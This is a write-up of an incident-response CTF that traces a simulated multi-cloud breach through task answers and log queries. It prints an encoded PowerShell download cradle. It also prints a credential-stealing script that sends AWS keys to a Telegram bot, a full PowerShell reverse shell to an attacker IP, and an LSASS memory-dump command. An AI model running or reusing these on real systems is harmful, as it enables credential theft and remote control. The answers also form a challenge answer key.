The Hunters Games 2025 - CTF Write Up
π Task 0 - Get Startedβ
What began as a seemingly ordinary day at Dunder Mifflin took a sharp turn when IT noticed a spike in suspicious behavior across the companyβs cloud infrastructure. Within hours, unexpected activity began surfacing in critical services, and by the time IT escalated the issue, some of the companyβs production environment had already been wiped.
Thatβs when corporate called you in.
You are part of the elite Incident Response Team, tasked with investigating this sophisticated cyber attack spanning multiple cloud services. Your toolkit is the Hunters platform and access to logs stored in Snowflake. Your mission is to trace the attackerβs footsteps, uncover the scope of the breach, and determine exactly how deep the compromise goes, before more damage is done.
Let's start easy.
How many leads were created in Hunters over the past 60 days?
1209
π Task 1 - Attack Storyβ
As you delve into the logs and trace the steps of the attacker, A user reported receiving a suspicious message on Teams,
What is the overall score of the attack story correlating activity with Microsoft Teams?
357
Navigate to the Stories page under Threat Hunting section in Hunters and switch to Bookmark to see all the bookmarked stories.
π Task 2 - Suspicious Messageβ
A user reported receiving a message that appeared to come from internal IT. Upon closer inspection, the sender's address raised some red flags.
What was the Email address used by the attacker?
π Task 3 - Suspicious Message #2β
Continuing your investigation into the attack in Hunters, you analyze the logs to determine the extent of the attacker's phishing activity.
How many messages did the attacker send during the conversation?
4
π Task 4 - Suspicious Message #3β
What URL did the attacker send that was used to initiate the compromise?
hxxps[://]drive[.]google[.]com/file/d/1jPXKHYbiOOz7pvZXyR2xxrNuQx60Dny4/view?usp=sharing
βοΈ SnowFlake Query:
SELECT
event_time,
operation,
user_id,
raw
FROM
o365_audit_logs
WHERE
user_id ILIKE '%[email protected]%'
ORDER BY
event_time DESC;
π Task 5 - Compromised Hostβ
An alert indicates of suspicious activities on an endpoint in Hunters was found. Your task is to identify critical details about the compromised host.
What is the hostname of the initially compromised host?
MICHAEL-SCOTT-P
π Task 6 - RMM Toolβ
The attacker manipulated the user into establishing a connection back to their infrastructure, giving them remote access to the machine.
What is the domain name of the instance the attacker used to host the session?
node484265.dwservice.net
π Task 7 - Malicious Payloadβ
Upon further investigation, you discover that a malicious payload was executed by the attacker.
What is the process UID of the process that initially executed the payload?
23362585139
π Task 8 - Payload Originβ
As you investigate the payload, you uncover an obfuscated command, By reversing the obfuscation, you can trace the origin of the payload.
What is the full URL from which the payload was downloaded?
hxxps[://]raw[.]githubusercontent[.]com/TheOfficeIT/Tools/refs/heads/main/auto_patch[.]ps1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "LgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACIASQAiACwAIgBFAFgAIgApACAAKAAmACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAIgBOAGUAdwAiACwAIgB0ACIALAAiAC0ATwBiAGoAZQBjACIAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAIgBDAGwAaQBlACIALAAiAE4AZQB0AC4AVwBlAGIAIgAsACIAdAAiACwAIgBuACIAKQApAC4AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACIAZABTAHQAIgAsACIARABvAHcAbgBsACIALAAiAHIAaQBuAGcAIgAsACIAbwBhACIAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAOAB9AHsAMQB9AHsAMQA1AH0AewA1AH0AewAxADMAfQB7ADAAfQB7ADEAOAB9AHsANgB9AHsANwB9AHsAMQA2AH0AewA5AH0AewAzAH0AewAxADQAfQB7ADQAfQB7ADIAfQB7ADEAMAB9AHsAMQAxAH0AewAxADcAfQB7ADEAMgB9ACIAIAAtAGYAIgBiACIALAAiAHQAdABwAHMAOgAvAC8AcgAiACwAIgBoAGUAYQBkAHMALwBtAGEAaQBuAC8AIgAsACIAZQBJACIALAAiAG8AbwBsAHMALwByAGUAZgBzAC8AIgAsACIAdwAuAGcAaQAiACwAIgBlAHIAYwBvAG4AdABlAG4AIgAsACIAdAAuAGMAbwBtAC8AIgAsACIAaAAiACwAIgBPAGYAZgBpAGMAIgAsACIAYQB1AHQAIgAsACIAbwBfAHAAIgAsACIAMQAiACwAIgB0AGgAdQAiACwAIgBUAC8AVAAiACwAIgBhACIALAAiAFQAaABlACIALAAiAGEAdABjAGgALgBwAHMAIgAsACIAdQBzACIAKQApAA=="
.("{0}{1}" -f "I","EX") (&("{0}{2}{1}" -f "New","t","-Objec") ("{1}{0}{3}{2}" -f "Clie","Net.Web","t","n")).("{1}{3}{0}{2}"-f"dSt","Downl","ring","oa").Invoke(("{8}{1}{15}{5}{13}{0}{18}{6}{7}{16}{9}{3}{14}{4}{2}{10}{11}{17}{12}" -f"b","ttps://r","heads/main/","eI","ools/refs/","w.gi","erconten","t.com/","h","Offic","aut","o_p","1","thu","T/T","a","The","atch.ps","us"))
The full script is just using a bunch of "string" -f ...
format calls to hide its true functionality.
π Deobfuscate the Hardcoded Stringsβ
("{0}{1}" -f "I", "EX")
β IEX
(&("{0}{2}{1}" -f "New", "t", "-Objec"))
β New-Object
("{1}{0}{3}{2}" -f "Clie", "Net.Web", "t", "n")
β Net.WebClient
("{1}{3}{0}{2}" -f "dSt", "Downl", "ring", "oa")
β DownloadString
π£ Final payload URL:
("{8}{1}{15}{5}{13}{0}{18}{6}{7}{16}{9}{3}{14}{4}{2}{10}{11}{17}{12}" -f
"b", "ttps://r", "heads/main/", "eI", "ools/refs/", "w.gi", "erconten", "t.com/", "h",
"Offic", "aut", "o_p", "1", "thu", "T/T", "a", "The", "atch.ps", "us")
β hxxps[://]raw[.]githubusercontent[.]com/TheOfficeIT/Tools/refs/heads/main/auto_patch[.]ps1
π PowerShell Scriptβ
# Step-by-step deobfuscation
$part1 = "{0}{1}" -f "I", "EX" # β IEX
$part2 = "{0}{2}{1}" -f "New", "t", "-Objec" # β New-Object
$part3 = "{1}{0}{3}{2}" -f "Clie", "Net.Web", "t", "n" # β Net.WebClient
$part4 = "{1}{3}{0}{2}" -f "dSt", "Downl", "ring", "oa" # β DownloadString
# Final payload string
$url = "{8}{1}{15}{5}{13}{0}{18}{6}{7}{16}{9}{3}{14}{4}{2}{10}{11}{17}{12}" -f `
"b", "ttps://r", "heads/main/", "eI", "ools/refs/", "w.gi", "erconten", "t.com/", `
"h", "Offic", "aut", "o_p", "1", "thu", "T/T", "a", "The", "atch.ps", "us"
# Assemble final command
$finalCommand = "$part1 (`$($part2 $part3).$part4('$url'))"
Write-Host "`nβ
Reconstructed (but not executed) command:`n$finalCommand`n"
π Task 9 - Payload Analysisβ
Your analysis of the obfuscated payload reveals it pulls a second malicious payload from an external source. Upon execution, the payload begins interacting with local resources.
What is the name of the file that the payload attempts to read?
.aws\credentials
π¨ auto_patch.ps1
β
The powershell payload which gets downloaded from GitHub.
$wzy = "59";$tt = "58";$hes = "38";$123 = "37";$x4 = "10";$ty = ":";$gg = "AA";$ls = "GV";$hf = "Sw";$whoami = "vG";$whoareu = "fI";$potat = "RF";$xaxa = "YH";$yel = "Mq";$ydidu = "E0";$lol = "5x";$brb = "lC";$afk = "NI";$xor = "xz";$2s = "C-";$sha420 = "5O";$base58 = "Rp";$pythagoras = "Bo";$charles = "I"
$temp = $wzy + $tt + $hes + $123 + $x4 + $ty + $gg + $ls + $hf + $whoami + $whoareu + $potat + $xaxa + $yel + $ydidu + $lol + $brb + $afk + $xor + $2s + $sha420 + $base58 + $pythagoras + $charles
$__ox = "604"
$__cx = "972"
$__fx = "174"
$nsa842jf2 = $__cx + $__fx + $__ox
$__path_frag = ".aws\credentials"
$w26zxa842 = Get-Content (Join-Path $env:USERPROFILE $__path_frag) -Raw
$__tapi = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA=="))
$24t8veb = $__tapi + $temp + "/sendMessage"
Invoke-RestMethod -Uri $24t8veb -Method Post -Body @{ chat_id = $nsa842jf2; text = $w26zxa842 }
π Python Deobuscation Scriptβ
deobufscate_auto_patch.py
import re
import base64
code = r"""$wzy = "59";$tt = "58";$hes = "38";$123 = "37";$x4 = "10";$ty = ":";$gg = "AA";$ls = "GV";$hf = "Sw";$whoami = "vG";$whoareu = "fI";$potat = "RF";$xaxa = "YH";$yel = "Mq";$ydidu = "E0";$lol = "5x";$brb = "lC";$afk = "NI";$xor = "xz";$2s = "C-";$sha420 = "5O";$base58 = "Rp";$pythagoras = "Bo";$charles = "I"
$temp = $wzy + $tt + $hes + $123 + $x4 + $ty + $gg + $ls + $hf + $whoami + $whoareu + $potat + $xaxa + $yel + $ydidu + $lol + $brb + $afk + $xor + $2s + $sha420 + $base58 + $pythagoras + $charles
$__ox = "604"
$__cx = "972"
$__fx = "174"
$nsa842jf2 = $__cx + $__fx + $__ox
$__path_frag = ".aws\credentials"
$w26zxa842 = Get-Content (Join-Path $env:USERPROFILE $__path_frag) -Raw
$__tapi = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA=="))
$24t8veb = $__tapi + $temp + "/sendMessage"
Invoke-RestMethod -Uri $24t8veb -Method Post -Body @{ chat_id = $nsa842jf2; text = $w26zxa842 }"""
# Extract all variable assignments
vars = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]+)"', code))
# Extract temp construction line
temp_line = re.search(r'\$temp\s*=\s*(.+)', code).group(1)
temp_vars = re.findall(r'\$(\w+)', temp_line)
# Resolve final token
token = ''.join(vars[v] for v in temp_vars)
# Extract chat_id
chat_id = ''.join([vars['__cx'], vars['__fx'], vars['__ox']])
# Extract base64 API
b64_api = re.search(r'FromBase64String\("([^"]+)"\)', code).group(1)
api = base64.b64decode(b64_api).decode()
# Build final URL
final_url = f"{api}{token}/sendMessage"
# Print all
print("β
Telegram Bot Token:", token)
print("β
Chat ID:", chat_id)
print("β
Final Exfil URL:", final_url)
π Resultβ
β
Telegram Bot Token: 5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI
β
Chat ID: 972174604
β
Final Exfil URL: hxxps[://]api[.]telegram[.]org/bot5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI/sendMessage
π Task 10 - Payload Analysis #2β
What is the full domain the payload sends its request to?
hxxps[://]api[.]telegram[.]org/bot5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI/sendMessage
π Task 10.5 - Payload Analysis #3β
What is the secret token used in the payload?
5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI
π Task 11 - Persistence Techniqueβ
To maintain access to the compromised device, the attacker established a method of persistence
What process did the attacker use to implement persistence?
bitsadmin.exe
π Task 12 - Persistence Identificationβ
What is the name for the job that was created?
AdobeUpdaterTask
π Task 13 - Reverse Shell Originsβ
The investigation reveals a reverse shell was initiated during the attack.
What is the attacker IP used for persistence?
20.7.173.122
$client = New - Object System.Net.Sockets.TCPClient("20.7.173.122", 9001);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|% {
0
}
;
while(($i = $stream.Read($bytes, 0, $bytes.Length)) - ne 0) {
;
$data = (New - Object - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2 > &1 | Out - String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush()
}
;
$client.Close()
π Task 14 - Privilege Escalationβ
In their attack, the attacker exploited a specific DLL on a remote machine.
What is the DLL name abused by the attacker on the remote machine?
comsvcs.dll
π Task 15 - Privilege Escalation #2β
During their privilege escalation phase, the attacker executed a known Windows DLL with a crafted argument: #+0000^24
What function was invoked as a result of this execution?
MiniDumpW
π Explanationβ
The command:
rundll32.exe C:\Windows\System32\comsvcs.dll #+000024 " 728 text.dmp full"
is using rundll32.exe
to invoke a function within comsvcs.dll
and specifically, the function associated with the export ordinal #24 (#+000024
).
rundll32.exe
can be used to execute exported functions in DLLs.comsvcs.dll
(Component Services) exports many undocumented functions.- Ordinal #24 corresponds to a function in
comsvcs.dll
that wraps aroundMiniDumpW
, an internal helper function used for memory dumps.
Argument | Meaning |
---|---|
728 | Target PID (often LSASS) |
text.dmp | Output dump filename |
full | Type of dump (full memory) |
π Goalβ
This allows to dump memory of a process (in this case, PID 728
) to a file (text.dmp
) without needing third-party tools like procdump
.
- Used to dump the memory of LSASS - Local Security Authority Subsystem Service or other sensitive processes to extract credentials.
- Common technique in tools like Mimikatz, Cobalt Strike, or manual post-exploitation.
- Bypasses AV detection in many cases because
comsvcs.dll
is a signed, native Windows binary (aka LOLBin β Living Off the Land Binary).
π What Does LSASS Do?
Function | Description |
---|---|
β User Authentication | Verifies credentials during login (username + password). |
π Credential Management | Stores hashed or plaintext credentials (e.g., NTLM hashes, Kerberos tickets). |
π Token Creation | Generates access tokens for authenticated users and processes. |
π Security Auditing | Logs security events (logins, privilege use, etc.) via Event ID 4624, etc. |
π§ SSPI Interface | Exposes authentication APIs to applications via the Security Support Provider Interface. |
𧨠Why Is LSASS Targeted by Attackers?
Because LSASS holds credentials in memory, attackers try to:
-
Dump LSASS memory to extract:
- NTLM password hashes
- Cleartext passwords (in some configurations)
- Kerberos tickets (TGTs, service tickets)
-
Tools like:
Mimikatz
ProcDump
rundll32 comsvcs.dll,#24
MiniDump
APIs
β If LSASS is dumped, the system is compromised and likely every user who's logged in.
π Task 16 - Credentials Dumpβ
As part of their tactics, the attacker dumped credentials to a specific file on the system.
What is the file name of the file that contains the dumped credentials?
text.dmp
π Task 17 - Enumerationβ
After gaining access, the attacker began searching through the compromised machine for valuable information, Several files stood out as likely targets during this enumeration phase, all pointing toward credential harvesting.
Name one of the files the attacker accessed during his enumeration.
chrome_creds.json
The attacker is enumerating for stored credentials, these shortcuts point to recently opened files.
- Password database files (
db_passwords
,chrome_creds.json
) - Config files (
pws.conf
,motsdepasse
)
π Task 18 - Lateral Movementβ
As the investigation progressed, traces of suspicious activity extended beyond the on-prem environment and into the organizationβs cloud infrastructure. Evidence suggests the attacker used previously stolen credentials to gain initial access to AWS.
Which ARN was compromised and used by the attacker to access the AWS environment?
arn:aws:iam::588101796321:user/michael_scott
β What is an ARN?
An ARN is an Amazon Resource Name, which is a unique identifier used by AWS to refer to resources, users, roles, policies, and more across AWS services.
𧬠ARN Format:
arn:partition:service:region:account-id:resource-type/resource-id
π Example (for an IAM Role):
arn:aws:iam::123456789012:role/AdminAccess
π Task 19 - AWS Compromiseβ
What is the ID of the AWS access key that was compromised?
AKIAYR3MZIHQ3RFG7LRY
π Task 20 - Initial Commandsβ
Upon gaining access to AWS, the attacker issued a series of commands.
What is the 2nd command executed by the attacker?
GetAccountSummary
π Task 21 - AWS Sign-inβ
With access to AWS API keys, the attackerβs next move was to transition into a console session, giving them interactive access to cloud resources. This requires calling a specific API to obtain temporary credentials suitable for login.
Which AWS API call enabled the attacker to generate a token for console access?
sts:GetFederationToken
To enable attacker access to the AWS Management Console using previously stolen keys, they needed to transform static credentials into a login-capable session. In AWS STS - Security Token Service, this is achieved through dedicated API calls.
β Which AWS API call enabled console access?β
sts:GetFederationToken
This API call produces a set of temporary security credentials (AccessKeyId
, SecretAccessKey
, SessionToken
) specifically intended for federated users, which can be used with AWS Federation endpoints to create a console sign-in tokenβthereby allowing interactive console access.
You can find more informations at the official AWS - User Guide (Enable custom identity broker access to the AWS console)
π Task 22 - AWS Sign-in #2β
Following the creation of a federation token, a access key was generated and used in the activity.
What is the ID of the AWS access key that was used for the console login?
ASIAYR3MZIHQZN4LQCMP
π Task 23 - AWS Sign-in #3β
The attacker left behind a small clue about the system they were using
What is the operating system version used by the attacker?
10.15.7
π Task 24 - Persistenceβ
In order to maintain access to the environment without drawing attention, the attacker made a specific AWS API call that granted them a persistent identity
What AWS API call did the attacker use to establish persistence in the environment?
CreateUser
βοΈ SnowFlake Query:
SELECT
event_name,
event_time,
user_identity_type,
user_identity_user_name,
source_ip_address,
event_source,
error_code,
request_parameters
FROM
aws_cloudtrail
WHERE
event_name = 'CreateUser'
ORDER BY
event_time DESC;
π Task 25 - Persistence #2β
What is the ID of the access key issued as part of this suspicious action?
AIDAYR3MZIHQ6ZIHWQAAR
βοΈ SnowFlake Query:
SELECT *
FROM
aws_cloudtrail
WHERE
event_time BETWEEN '2025-07-25 19:09:20.000 +0000'
AND '2025-07-25 20:09:20.000 +0000'
ORDER BY
event_time ASC;
π Task 26 - Persistence #3β
Name one of the IAM policies attached to this access key?
AmazonEC2FullAccess
π Task 27 - Secret Exfiltrationβ
As part of his attack, the attacker exfiltrated production secrets.
What is the 2nd secret name accessed by the attacker?
dunder_production_2
SnowFlake Query:
SELECT *
FROM
aws_cloudtrail
WHERE
event_name ILIKE '%Secret%'
ORDER BY
event_time ASC;
π Task 28 - Lateral Movementβ
After enumerating the AWS environment, the attacker decided to connect to an EC2 instance.
What is the Instance ID of the instance the attacker accessed?
i-057b9e5dbbad18a06
βοΈ SnowFlake Query:
SELECT
DISTINCT CAST(
GET_PATH (
request_parameters,
'instancesSet.items[0].instanceId'
) AS VARCHAR
) AS instance_id
FROM
aws_cloudtrail
WHERE
event_name ILIKE '%RunInstances%'
OR event_name ILIKE '%StartInstances%'
OR event_name ILIKE '%DescribeInstances%';
π Task 28.5 - Machine Identificationβ
After enumerating the AWS environment, the attacker decided to connect to an EC2 instance.
What is the EDR Agent ID of the instance?
61a702bec07c429b97a8d80f3eec7189
βοΈ SnowFlake Query:
SELECT
DEVICE_ID,
HOSTNAME,
OS_VERSION,
EXTERNAL_IP,
CID
FROM CROWDSTRIKE_DEVICES
WHERE os_version ILIKE '%Server%'
π Task 29 - Command Executionβ
After identifying the Instance that was used by the attacker. You continued with the investigation, trying to identify commands executed on the machine.
Can you specify the EDR Target process ID of the process executed by the attacker?
65581976079
π Task 30 - Dead Endβ
Your investigation into the deletion of production infrastructure in Azure has reached a dead end. The only remaining lead is a suspicious instance previously accessed by the attacker. While reviewing activity from that host, you uncover a set of requests targeting a different cloud resources.
What is the third resource the attacker made a request to?
hxxps[://]graph[.]microsoft[.]com/
π Task 31 - Dead End #2β
In reviewing activity from a compromised cloud-connected instance, you uncover a set of requests that target internal metadata endpoints.
What technique was used by the attacker? Provide the full name of the first contributor listed under this technique in MITRE ATT&CK.
Alon Klayman
T1078: Valid Accounts: Cloud Accounts
π Task 32 - Dead End #3β
Based on the name of the accessed resource, you understand that this machine has a special configuration enabling it to act as a bridge between environments.
What is the feature name that is enabled on this instance that allows it?
Azure Arc Resource Bridge
- Manage and connect non-Azure environments, like onβprem servers or edge devices, from within Azure
- Provide a centralized resource plane that enables hybrid, multi-cloud resource management
- Support workloads such as VMs and Kubernetes clusters running outside primary Azure subscriptions
π§Ύ Why It Fitsβ
Since the instance was observed making metadata and resource API calls (like to Graph
, Key Vault
, etc.), this strongly suggests it is part of an Arcβmanaged infrastructure, effectively acting as a 'bridge
' node between cloud and other environments.
π Task 33 - Azure Initial Accessβ
Your investigation reveals a cloud identity was used to gain initial access to the Azure environment.
What is the resource principal ID of the compromised identity?
f185b5ac-c369-42ab-808f-97e0b40cccfe
πͺͺ Identified Activitiesβ
The compromised cloud identity had extensive and unauthorized access to critical Azure resources, notably:
- Azure SQL Database
- Azure Storage
- Microsoft.HybridCompute Agent Service
- Azure Key Vault
- Azure Resource Manager
- Arc Token Service
- Microsoft Graph
- ArcGatewayApp
- GuestNotificationService
These resource accesses were notably associated with an identity consistently logged across multiple sensitive services, indicative of automated or malicious activity.
𧬠Analysis Methodologyβ
-
Aggregated logs from Azure sign-in events were analyzed.
-
Suspicious access patterns were identified, focusing on unusual IP addresses and access to sensitive resources.
-
Cross-referencing resource access timestamps, it was clear this identity repeatedly interacted with multiple critical resources within short intervals.
π΅οΈββοΈ Implicationsβ
The breadth of access signifies that this compromised identity posed a high risk to the Azure environment, potentially enabling extensive lateral movement or data exfiltration activities.
π Task 33.5 - Azure Initial Access #2β
You dig through Azure sign-in data to validate the suspicious activity. The events linked to this identity are stored in a distinct log category designed for a specific type of authentication flow.
What is the log category name where the sign-in activity of this identity appears?
ManagedIdentitySignInLogs
βοΈ SnowFlake Query:
SELECT
DISTINCT category
FROM
azure_signin
π Task 34 - Azure Initial Access #3β
During your investigation, you come across a suspicious sign-in attributed to the Identity. However, something about the event seems off, thereβs a critical piece of metadata missing.
What is the IP Address used by the attacker to sign in to the resources?
52.136.29.3
π Task 35 - Attack on Azureβ
What is the name of the second machine that was affected by the compromised identity?
printing-service-prod-2
-
Parsed the
IDENTITY_AUTHORIZATION
field inazure_signin
logs.- filtering specifically for events involving the compromised identity (
f185b5ac-c369-42ab-808f-97e0b40cccfe
)
- filtering specifically for events involving the compromised identity (
-
Extracted the virtual machine names embedded in the Azure resource scopes.
- Two distinct VMs were identified:
printing-service-prod-1
andprinting-service-prod-2
- Two distinct VMs were identified:
-
printing-service-prod-2
was listed second chronologically and is confirmed as the second affected machine.
π Task 36 - Attacker Identityβ
Youβve identified the attackerβs external payload source, attackers often leave behind artifacts. A closer look at where the malicious script is hosted may reveal more about who's behind it.
Can you uncover the attackerβs original email address?